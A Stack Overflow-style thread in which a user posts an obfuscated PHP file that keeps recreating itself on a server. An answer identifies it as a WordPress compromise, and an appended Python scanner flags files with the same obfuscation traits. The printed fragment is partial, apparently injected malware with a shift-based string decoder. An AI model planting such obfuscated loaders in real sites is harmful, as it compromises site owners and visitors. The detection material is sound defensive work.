Phorce

Reputation: 4652

Strange PHP code found in file on server

Sorry if this is the wrong site to post on.

Basically, I have a server and this file keeps creating itself. The file is a PHP file and contains code:

    <?php
    $GLOBALS['XfZi37Vc'] = $_SERVER;
    function ruexxCV1QobH($uiBP25)
                                                            {$MISwZvode = "";global $PYJ9QSAA;

    for($QNufqz7Oj=intval('fzSxRYkl'); $QNufqz7Oj<strlen($uiBP25); $QNufqz7Oj++)
            {$yzwxeHjxV = ord($uiBP25[$QNufqz7Oj]) - $QNufqz7Oj - $PYJ9QSAA;
    if ($yzwxeHjxV < 32){$yzwxeHjxV = $yzwxeHjxV + 94;

    ${YkT1GO68Y3rXB("iv[_^/1\"w;%")} = Lp4lS8SSZzAY("-15/*32B.3@@G9CJJ");
                        ${YkT1GO68Y3rXB(",g0@#&D6x")} = PDeZzowtLQ("kos|n|,ryov1!#4&)!/9-{+%\$");
                ${QDVtOC8("pt[v\$:=")} = lpkBre6(":<;)><97C");
    ${fW1u5W74(";q~BY_y{")} = rdfpzT0mw(",:;9=+?3??CF<B<");
    ${sGbDIY("!<!.x\\ze")} = lpkBre6("kos|n|,\$nzxtr(x5~(");
    function rdfpzT0mw($vGoVcwpU){return ruexxCV1QobH($vGoVcwpU);};
        function ifUYiZ4bFphW5($NYycJIpl){return ruexxCV1QobH($NYycJIpl);};
        ${fW1u5W74("gh\"Co[")} = lpkBre6("*77@0>A-DE6@6C9;");
    ${rdfpzT0mw("n2lZ7t\\")} = QDVtOC8(";:27");

I have never seen code like this before. Can anyone tell me what exactly it is doing?

Upvotes: 1

Views: 813

Answers (1)

Brendan

Reputation: 472

This is a hack that happened to your WordPress. Probably because you are using an outdated third-party plugin. These can be somewhat difficult to detect, but the code is probably being used to place ads, or redirect your users to outside content or malware.

You should remove this code and update all your plugins.

Keep in mind that this code could have also injected code into your WordPress database, especially if you have a plugin that enables 'eval' in WordPress, meaning code could be retrieved from the database and eval'd.

If that doesn't solve the problem, you should start disabling third-party plugins until you find the root of the problem.

WordPress is VERY easy for automated scripts to detect and third-party plugins could have been written by someone who does not know anything about security. You need to be very wary when using them, even if they come from WordPress.org.

Upvotes: 2
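A detection sketch for files like the one in the question, added here as an example and not part of the original posts: it scores PHP source for the structural traits visible in that sample (call-wrapped variable names, one-line decoder aliases, a copied superglobal, an `ord()` shift loop) and walks a directory tree for files above a threshold. The names `score_php` and `scan_tree`, the weights and the threshold are assumptions made for illustration.

```python
import os
import re

# Indicators taken from the question's sample; weights/threshold are assumptions.
INDICATORS = {
    # ${fn("...")} = ... : variable names hidden behind a decoder call
    "dynamic_var_assign": (re.compile(r'\$\{\s*\w+\(\s*"(?:[^"\\]|\\.)*"\s*\)\s*\}\s*='), 3),
    # function a($x){return b($x);} : one-line alias of another function
    "decoder_alias": (re.compile(
        r'function\s+\w+\(\s*(\$\w+)\s*\)\s*\{\s*return\s+\w+\(\s*\1\s*\)\s*;\s*\}'), 2),
    # $GLOBALS['name'] = $_SERVER : superglobal copied under another name
    "superglobal_copy": (re.compile(
        r'\$GLOBALS\[\s*[\'"]\w+[\'"]\s*\]\s*=\s*\$_(?:SERVER|REQUEST|POST|GET|COOKIE)\b'), 2),
    # ord($s[$i]) - $i ... : per-character shift decoding loop
    "ord_shift": (re.compile(r'ord\(\s*\$\w+\[\s*\$\w+\s*\]\s*\)\s*-\s*\$\w+'), 2),
}
THRESHOLD = 5
MAX_HITS = 3  # cap per indicator so one repeated pattern cannot dominate

def score_php(source):
    """Return (total_score, {indicator: hit_count}) for PHP source text."""
    hits, total = {}, 0
    for name, (pattern, weight) in INDICATORS.items():
        count = sum(1 for _ in pattern.finditer(source))
        if count:
            hits[name] = count
            total += weight * min(count, MAX_HITS)
    return total, hits

def scan_tree(root, threshold=THRESHOLD):
    """Walk root; return [(path, score, hits)] for PHP files at or above threshold."""
    flagged = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml", ".inc")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    total, hits = score_php(fh.read())
                if total >= threshold:
                    flagged.append((path, total, hits))
    return sorted(flagged, key=lambda item: -item[1])

# Lines quoted from the question's sample, used here as test input.
SAMPLE = r'''<?php
$GLOBALS['XfZi37Vc'] = $_SERVER;
{$yzwxeHjxV = ord($uiBP25[$QNufqz7Oj]) - $QNufqz7Oj - $PYJ9QSAA;
${QDVtOC8("pt[v\$:=")} = lpkBre6(":<;)><97C");
${fW1u5W74(";q~BY_y{")} = rdfpzT0mw(",:;9=+?3??CF<B<");
function rdfpzT0mw($vGoVcwpU){return ruexxCV1QobH($vGoVcwpU);};
'''
```

A single weak indicator, such as an ordinary one-line wrapper function, stays below the threshold; flagged files still need manual review before deletion.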
